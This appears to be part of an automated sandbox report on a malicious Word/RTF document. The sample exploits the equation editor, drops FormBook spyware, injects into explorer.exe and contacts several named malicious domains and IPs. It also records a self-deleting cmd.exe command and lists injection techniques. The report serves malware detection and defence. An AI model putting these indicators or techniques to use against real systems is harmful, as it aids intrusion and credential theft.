          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeSection loaded: unknown target: C:\Users\user\AppData\Roaming\prosper3512.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: 540000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\prosper3512.exe C:\Users\user\AppData\Roaming\prosper3512.exe
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeProcess created: C:\Users\user\AppData\Roaming\prosper3512.exe C:\Users\user\AppData\Roaming\prosper3512.exe
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\prosper3512.exe'
          Source: explorer.exe, 00000006.00000000.2112996146.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.2112996146.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.2089134923.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.2112996146.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\user\AppData\Roaming\prosper3512.exeCode function: 4_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara matchFile source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343505318.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2084947742.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343583438.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2160305551.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2159230882.0000000000290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2086370454.00000000005C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.1.prosper3512.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.prosper3512.exe.5c0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.prosper3512.exe.5c0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.prosper3512.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara matchFile source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343505318.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2084947742.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2343583438.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2160305551.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2159230882.0000000000290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2086370454.00000000005C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.1.prosper3512.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.prosper3512.exe.5c0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.prosper3512.exe.5c0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.prosper3512.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.prosper3512.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API 1 | Path Interception | Process Injection 512 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 221 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
          Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 1 | LSASS Memory | Virtualization/Sandbox Evasion 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Exploitation for Client Execution 13 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 2 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Clipboard Data 1 | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 512 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 122 | SIM Card Swap | (none) | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | (none) | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 3 | Cached Domain Credentials | System Information Discovery 14 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | (none) | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 11 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | (none) | Data Encrypted for Impact

          Behavior Graph

          Behavior Graph ID: 432651 Sample: AWB00028487364 -000487449287.doc Startdate: 10/06/2021 Architecture: WINDOWS Score: 100
          Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 12 other signatures
          • EQNEDT32.EXE (11) started. Network: carbinz.ga 185.239.243.112, 49165, 80 CLOUDIE-AS-APCloudieLimitedHK Moldova Republic of. Dropped: C:\Users\user\AppData\...\prosper3512.exe, PE32; C:\Users\user\AppData\...\prosperx[1].exe, PE32. Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802). Started prosper3512.exe.
          • WINWORD.EXE (291 25) started.
          • prosper3512.exe (20), started by EQNEDT32.EXE. Dropped: C:\Users\user\AppData\Local\...\System.dll, PE32. Signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Machine Learning detection for dropped file; 2 other signatures. Started a second prosper3512.exe.
          • prosper3512.exe (second instance). Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection). Started control.exe; injected explorer.exe.
          • control.exe. Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements. Started cmd.exe.
          • explorer.exe (injected). Network: centerstageacademyaz.com 184.168.131.241, 49167, 80 AS-26496-GO-DADDY-COM-LLCUS United States; www.skip1-dndasasd.com; 2 other IPs or domains. Signature: System process connects to network (likely due to code injection or exploit).
          • cmd.exe, started by control.exe.


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          AWB00028487364 -000487449287.doc | 30% | Virustotal | 
          AWB00028487364 -000487449287.doc | 36% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Roaming\prosper3512.exe | 100% | Joe Sandbox ML | 
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe | 100% | Joe Sandbox ML | 
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe | 30% | ReversingLabs | Win32.Spyware.Noon
          C:\Users\user\AppData\Local\Temp\nsu2B38.tmp\System.dll | 0% | Metadefender | 
          C:\Users\user\AppData\Local\Temp\nsu2B38.tmp\System.dll | 0% | ReversingLabs | 
          C:\Users\user\AppData\Roaming\prosper3512.exe | 30% | ReversingLabs | Win32.Spyware.Noon

Unpacked PE Files

Source | Detection | Scanner | Label
7.2.control.exe.540000.0.unpack | 100% | Avira | TR/Dropper.Gen
5.1.prosper3512.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
7.2.control.exe.6523a8.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
7.2.control.exe.262f834.4.unpack | 100% | Avira | TR/Patched.Ren.Gen
4.2.prosper3512.exe.5c0000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.2.prosper3512.exe.25d0000.4.unpack | 100% | Avira | TR/Dropper.Gen
7.0.control.exe.540000.0.unpack | 100% | Avira | TR/Dropper.Gen
5.0.prosper3512.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
5.2.prosper3512.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
4.0.prosper3512.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
5.2.prosper3512.exe.5772f0.1.unpack | 100% | Avira | TR/Dropper.Gen
4.2.prosper3512.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482

Domains

Source | Detection | Scanner | Label
carbinz.ga | 7% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://www.mercadolivre.com.br/ | 0% | URL Reputation | safe
http://www.merlin.com.pl/favicon.ico | 0% | URL Reputation | safe
http://www.dailymail.co.uk/ | 0% | URL Reputation | safe
http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
http://image.excite.co.jp/jp/favicon/lep.ico | 0% | URL Reputation | safe
www.updatesz.com/hlx/ | 0% | Avira URL Cloud | safe
http://busca.igbusca.com.br//app/static/images/favicon.ico | 0% | URL Reputation | safe
http://www.etmall.com.tw/favicon.ico | 0% | URL Reputation | safe
http://it.search.dada.net/favicon.ico | 0% | URL Reputation | safe
http://search.hanafos.com/favicon.ico | 0% | URL Reputation | safe
http://cgi.search.biglobe.ne.jp/favicon.ico | 0% | Avira URL Cloud | safe
http://www.abril.com.br/favicon.ico | 0% | URL Reputation | safe
http://search.msn.co.jp/results.aspx?q= | 0% | URL Reputation | safe
http://buscar.ozu.es/ | 0% | URL Reputation | safe
http://busca.igbusca.com.br/ | 0% | URL Reputation | safe
http://search.auction.co.kr/ | 0% | URL Reputation | safe
http://busca.buscape.com.br/favicon.ico | 0% | URL Reputation | safe
http://www.pchome.com.tw/favicon.ico | 0% | URL Reputation | safe
http://browse.guardian.co.uk/favicon.ico | 0% | URL Reputation | safe
http://google.pchome.com.tw/ | 0% | URL Reputation | safe
http://www.ozu.es/favicon.ico | 0% | URL Reputation | safe
http://search.yahoo.co.jp/favicon.ico | 0% | URL Reputation | safe
http://www.gmarket.co.kr/ | 0% | URL Reputation | safe
http://searchresults.news.com.au/ | 0% | URL Reputation | safe
http://www.asharqalawsat.com/ | 0% | URL Reputation | safe
http://search.yahoo.co.jp | 0% | URL Reputation | safe
http://buscador.terra.es/ | 0% | URL Reputation | safe
http://search.orange.co.uk/favicon.ico | 0% | URL Reputation | safe
http://www.iask.com/ | 0% | URL Reputation | safe
http://cgi.search.biglobe.ne.jp/ | 0% | Avira URL Cloud | safe
http://search.ipop.co.kr/favicon.ico | 0% | URL Reputation | safe
http://p.zhongsou.com/favicon.ico | 0% | URL Reputation | safe
http://service2.bfast.com/ | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
carbinz.ga | 185.239.243.112 | true | true | | unknown
centerstageacademyaz.com | 184.168.131.241 | true | true | | unknown
www.pwagih.com | unknown | unknown | true | | unknown
www.skip1-dndasasd.com | unknown | unknown | true | | unknown
www.centerstageacademyaz.com | unknown | unknown | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
www.updatesz.com/hlx/ | true | Avira URL Cloud: safe | low

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://search.chol.com/favicon.ico | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.mercadolivre.com.br/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.merlin.com.pl/favicon.ico | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://search.ebay.de/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.mtv.com/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.rambler.ru/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.nifty.com/favicon.ico | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.dailymail.co.uk/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://www3.fnac.com/favicon.ico | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1 | explorer.exe, 00000006.00000000.2096881380.00000000041AD000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.2104229278.0000000008471000.00000004.00000001.sdmp | false | | high
http://buscar.ya.com/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.yahoo.com/favicon.ico | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.iis.fhg.de/audioPA | explorer.exe, 00000006.00000000.2097698723.0000000004B50000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sogou.com/favicon.ico | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://asp.usatoday.com/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://fr.search.yahoo.com/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://rover.ebay.com | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://in.search.yahoo.com/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://img.shopzilla.com/shopzilla/shopzilla.ico | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.ebay.in/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://image.excite.co.jp/jp/favicon/lep.ico | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://msk.afisha.ru/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.msn.com/?ocid=iehps | explorer.exe, 00000006.00000000.2104229278.0000000008471000.00000004.00000001.sdmp | false | | high
http://busca.igbusca.com.br//app/static/images/favicon.ico | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1es | explorer.exe, 00000006.00000000.2104229278.0000000008471000.00000004.00000001.sdmp | false | | high
http://search.rediff.com/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.windows.com/pctv. | explorer.exe, 00000006.00000000.2095586228.0000000003C40000.00000002.00000001.sdmp | false | | high
http://www.ya.com/favicon.ico | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.etmall.com.tw/favicon.ico | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://it.search.dada.net/favicon.ico | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://search.naver.com/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.google.ru/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.hanafos.com/favicon.ico | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://cgi.search.biglobe.ne.jp/favicon.ico | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.abril.com.br/favicon.ico | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://search.daum.net/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.naver.com/favicon.ico | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.msn.co.jp/results.aspx?q= | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.clarin.com/favicon.ico | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://buscar.ozu.es/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://kr.search.yahoo.com/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.about.com/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://busca.igbusca.com.br/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2 | explorer.exe, 00000006.00000000.2095206915.00000000039F4000.00000004.00000001.sdmp | false | | high
http://www.ask.com/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.priceminister.com/favicon.ico | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.cjmall.com/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.centrum.cz/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://suche.t-online.de/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.google.it/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.auction.co.kr/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.ceneo.pl/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.amazon.de/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://nsis.sf.net/NSIS_Error | prosper3512.exe, prosper3512.exe, 00000004.00000002.2086274371.0000000000409000.00000004.00020000.sdmp, prosper3512.exe, 00000005.00000000.2081643201.0000000000409000.00000008.00020000.sdmp | false | | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000006.00000000.2104229278.0000000008471000.00000004.00000001.sdmp | false | | high
http://sads.myspace.com/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://busca.buscape.com.br/favicon.ico | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.pchome.com.tw/favicon.ico | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://browse.guardian.co.uk/favicon.ico | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://google.pchome.com.tw/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://list.taobao.com/browse/search_visual.htm?n=15&amp;q= | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.rambler.ru/favicon.ico | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://uk.search.yahoo.com/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://espanol.search.yahoo.com/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.ozu.es/favicon.ico | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://search.sify.com/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://openimage.interpark.com/interpark.ico | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.yahoo.co.jp/favicon.ico | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://search.ebay.com/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.gmarket.co.kr/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://search.nifty.com/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://searchresults.news.com.au/ | explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe |
                                                                                                                      unknown
                                                                                                                      http://www.google.si/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.google.cz/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.soso.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.univision.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://search.ebay.it/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://busca.orange.es/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.target.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://buscador.terra.es/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://www.iask.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://www.tesco.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://search.interpark.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://investor.msn.com/explorer.exe, 00000006.00000000.2095586228.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://search.espn.go.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://www.myspace.com/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://search.centrum.cz/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://p.zhongsou.com/favicon.icoexplorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://service2.bfast.com/explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown

Contacted IPs

